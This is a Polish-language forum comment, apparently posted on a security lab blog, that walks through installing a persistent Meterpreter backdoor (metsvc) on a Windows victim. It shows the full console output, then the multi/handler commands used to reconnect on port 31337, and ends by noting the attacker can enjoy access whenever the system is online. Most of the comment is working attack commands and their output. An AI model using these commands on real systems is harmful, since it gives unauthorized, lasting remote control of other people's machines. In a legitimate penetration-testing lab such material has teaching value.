Hghormone
2p2 comments posted · 0 followers · following 0
15 years ago @ HARD CORE SECURITY LAB - Tak robią to komputer... · 1 reply · +1 points
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:DOCUME~1victimLOCALS~1TempJplTpVnksh...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
[*] * Installing service metsvc
* Starting service
Service metsvc successfully installed
Jak widzimy polecenie "run metsvc" powoduje zainstalownie backdoora na testowanym systemie oraz dodanie go do rejestru w celu każdorazowego uruchamiania przy starcie systemu.Backdoor ten nasłuchuje cały czas na porcie 31337.
Przykładowe połączenie z zainstalowanym backdoorem:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 192.168.1.104
msf exploit(handler) > expoit
Jak widzimy parametrem RHOST jest adres IP systemu na którym znajduje się backdoor, parametr LPORT jest portem na którym nasłuchuje nasz backdoor.Po uruchomieniu naszego PAYLOAD "metsvc_bind_tcp" komendą "exploit", nasze udane połączenie powinno wyglądać następująco:
[*] Starting the payload handler...
[*] Started bind handler
[*] Meterpreter session 2 opened (192.168.1.101:60840 ->; 192.168.1.104:31337)
I w ten oto sposób możemy cieszyć sie dostępem do systemu w każdej chwili gdy tylko dany system jest podlaczony do internetu :)
15 years ago @ HARD CORE SECURITY LAB - PWN2OWN 2010 - dzień ... · 1 reply · +1 points